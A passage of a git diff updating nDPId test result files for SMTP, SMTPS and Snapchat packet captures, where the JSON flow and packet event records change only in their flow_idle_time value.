-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388017124762,"flow_last_seen":1388017124762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1388017124762,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} 
+00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-data-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1388017125239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 36/36 diff --git a/test/results/smtp.pcap.out b/test/results/smtp.pcap.out index b41935f1b..c5a4af7d0 100644 --- a/test/results/smtp.pcap.out +++ b/test/results/smtp.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":934028408568} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":934028408568,"flow_last_seen":934028408568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":934028408568,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":934028408568,"flow_last_seen":934028408568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":934028408568,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":17955,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":934028408801} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 diff --git a/test/results/smtps.pcapng.out b/test/results/smtps.pcapng.out index c167bd140..5dd89248c 100644 --- a/test/results/smtps.pcapng.out +++ b/test/results/smtps.pcapng.out 
@@ -1,11 +1,11 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtps.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614938504972} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938504972,"flow_last_seen":1614938504972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938504972,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} -01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\/DbiCyixZpW6cPhrJJZKMPmmGE2v4GGVrqm684TKwAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAAEnAAsABAMAAQIACgAcABoAFwAZABwAGwAYABoAFgAOAA0ACwAMAAkACgAjAAAADQAgAB4GAQYCBgMFAQUCBQMEAQQCBAMDAQMCAwMCAQICAgMADwABAQAVAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938504972,"flow_last_seen":1614938504972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938504972,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} 
+01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\/DbiCyixZpW6cPhrJJZKMPmmGE2v4GGVrqm684TKwAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAAEnAAsABAMAAQIACgAcABoAFwAZABwAGwAYABoAFgAOAA0ACwAMAAkACgAjAAAADQAgAB4GAQYCBgMFAQUCBQMEAQQCBAMDAQMCAwMCAQICAgMADwABAQAVAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938505439} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 diff --git a/test/results/snapchat.pcap.out b/test/results/snapchat.pcap.out index 550be5ab6..b1a69bf9d 100644 --- a/test/results/snapchat.pcap.out +++ b/test/results/snapchat.pcap.out 
@@ -1,26 +1,26 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"snapchat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431417993318} 